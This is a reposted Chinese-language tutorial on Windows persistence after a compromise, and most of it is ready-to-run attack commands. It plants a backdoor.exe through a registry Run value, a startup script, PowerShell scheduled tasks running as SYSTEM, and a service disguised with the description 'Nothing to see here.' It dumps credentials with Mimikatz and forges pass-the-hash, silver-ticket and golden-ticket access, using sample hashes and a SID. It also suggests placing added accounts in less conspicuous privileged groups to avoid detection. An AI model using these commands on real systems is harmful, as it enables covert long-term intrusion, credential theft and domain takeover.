商城首页欢迎来到中国正版软件门户

您的位置:首页 >持续控制技术解析:持久化策略全攻略

持续控制技术解析:持久化策略全攻略

  发布于2025-11-12 阅读(0)

扫一扫,手机访问

在网络安全领域,一个完整的攻击生命周期通常包含以下7个主要步骤:

Recon(侦察)、Weaponisation(武器化)、Delivery(投递)、Exploitation(利用)、Installation(安装)、Command & Control(命令与控制)和Actions on Objectives(对目标采取行动)。其中,第5个步骤“Installation”指的是在不需要重复前4个步骤的情况下,重新获得对系统的命令和控制权。当某些操作无法进行时,可能需要考虑权限问题、UAC策略等。

本文将介绍一些基本的持久性策略和技术。通常,触发C2通道(命令与控制通道)的持久性机制存在于以下级别之一:

  • 中等强制级别,在标准用户的上下文中。
  • 在SYSTEM的背景下强制性水平较高。

UserLand 技术

在UserLand层面,常用的注册表路径包括:

  • HKCU:HKCR:HKEY_CLASSES_ROOT
  • HKCU:HKEY_CURRENT_USER
  • HKLM:HKEY_LOCAL_MACHINE
  • HKU:HKEY_USERS
  • HKCC:HKEY_CURRENT_CONFIG

持续控制技术和策略(A View of Persistence)

例如,可以在HKCU\Software\Microsoft\Windows(或其他路径)中创建一个REG_SZ值(字符串值):

持续控制技术和策略(A View of Persistence)

  • name: Backdoor
  • data: C:\users\CreaTe\AppData\Local\Temp\backdoor.exe

启动:

在用户启动文件夹中创建批处理脚本:

持续控制技术和策略(A View of Persistence)

@ echo off
start /d "C:\\Windows\\System32\\" calc.exe
pause

批处理脚本的作用是每次开机时启动脚本,从而触发backdoor.exe。

计划任务:

使用PowerShell创建计划任务:

PS C:\\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/cC:\\Users\\Rasta\\AppData\\Local\\Temp\\backdoor.exe"
PS C:\\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\\> $S = New-ScheduledTaskSettingsSet
PS C:\\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\\> Register-ScheduledTask Backdoor -InputObject $D

Powershell配置文件:

持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)

Elevated技术

在Elevated层面,常用的注册表路径包括:

  • HKLM:HKLM:HKEY_LOCAL_MACHINE
  • HKLM\Software\Microsoft\Windows

可以在这里设置name和data值。

服务:

创建一个将自动或按需启动的服务:

PS C:\\> New-Service -Name "Backdoor" -BinaryPathName "C:\\Windows\\Temp\\backdoor.exe" -Description "Nothing to see here."

持续控制技术和策略(A View of Persistence)

计划任务:

以System身份运行,每天上午9点触发:

PS C:\\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/cC:\\Windows\\Temp\\backdoor.exe"
PS C:\\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\\SYSTEM" -RunLevel Highest
PS C:\\> $S = New-ScheduledTaskSettingsSet
PS C:\\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\\> Register-ScheduledTask Backdoor -InputObject $D

维持特权:

使用runas脚本:

http://xinn.org/RunasVBS.html

持续控制技术和策略(A View of Persistence)

参考:

https://blog.csdn.net/u010984552/article/details/54891615

持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)

NTLM哈希:

权限始终是一个问题,可以导出Server Hash:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt

持续控制技术和策略(A View of Persistence)

使用sekurlsa::pth命令:

sekurlsa::pth /user:Administrator /domain:GOD/ntlm:ccef208c6485269c20db2cad21734fe7 (/run:运行的程序,默认cmd)

持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)

添加新的本地用户可以提供一种返回计算机的方法。如果将它们放在Administrators组中太明显,请使用其他特权组,例如Remote Desktop Users,Remote Management Users或Backup Operators。

白银票据:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt
mimikatz "kerberos::golden /domain: /sid: /target: /service: /rc4:<ntlm hash=""> /user:/ptt" exit</ntlm>

持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)

参考:

https://paper.tuisec.win/detail/af2385f4ed3a391
kerberos::golden /domain:GOD /sid:S-1-5-21-1218902331-2157346161-1782232778 /target: WebServer /service: cifs/rc4:518b98ad4178a53695dc997aa02d455c /user:Administrator /ptt exit

持续控制技术和策略(A View of Persistence)持续控制技术和策略(A View of Persistence)

OWA2010CN-God

黄金票据:

拿下域控:

lsadump::dcsync /domain:域名 /user:krbtgt
ms14068
mimikatz kerberos::golden /domain: /sid: /rc4:<krbtgtntlm hash=""> /user: /ptt exit</krbtgtntlm>

持续控制技术和策略(A View of Persistence)

来源:Ms08067安全实验室

本文转载于:https://cloud.tencent.com/developer/article/1512085 如有侵犯,请联系zhengruancom@outlook.com删除。
免责声明:正软商城发布此文仅为传递信息,不代表正软商城认同其观点或证实其描述。

热门关注